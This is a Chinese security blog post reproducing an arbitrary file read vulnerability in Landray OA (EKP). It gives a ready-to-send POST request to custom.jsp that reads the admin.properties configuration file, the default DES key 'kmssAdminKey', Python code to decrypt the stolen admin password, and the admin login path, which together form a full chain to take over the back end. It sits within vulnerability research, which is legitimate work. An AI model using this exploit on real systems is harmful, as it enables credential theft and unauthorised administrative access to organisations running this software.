X凌OA系统任意文件读取-DES解密

X凌OA系统任意文件读取-DES解密

一、漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息

二、漏洞影响

蓝凌OA

三、

利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件

读取路径：

/WEB-INF/KmssConfig/admin.properties

读取文件：

POC：

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: 127.0.0.1User-Agent: Go-http-client/1.1Content-Length: 60Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipvar={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

获取密码DES解密登陆后台：默认密钥为 kmssAdminKey

访问后台登台：

http://127.0.0.1/admin.do

成功登陆后台：

编写POC脚本验证：

还需要自己去验证解密：

编写本地DES解密：

def decrypt_str(s): k = des(Des_Key, ECB, Des_IV, pad=None, padmode=PAD_PKCS5) decrystr = k.decrypt(base64.b64decode(s)) print(decrystr) return decrypt_str

发现key字符过长：

ValueError: Invalid DES key size. Key must be exactly 8 bytes long.

密钥长了，查了一下下 需要前面8位就OK 也能解开

直接解密明文：

参考：

https://github.com/Cr4y0nXX/LandrayReadAnyFile

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

如果本文内容侵权或者对贵公司业务或者其他有影响，请联系作者删除。

转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上，与你并肩前行！！！！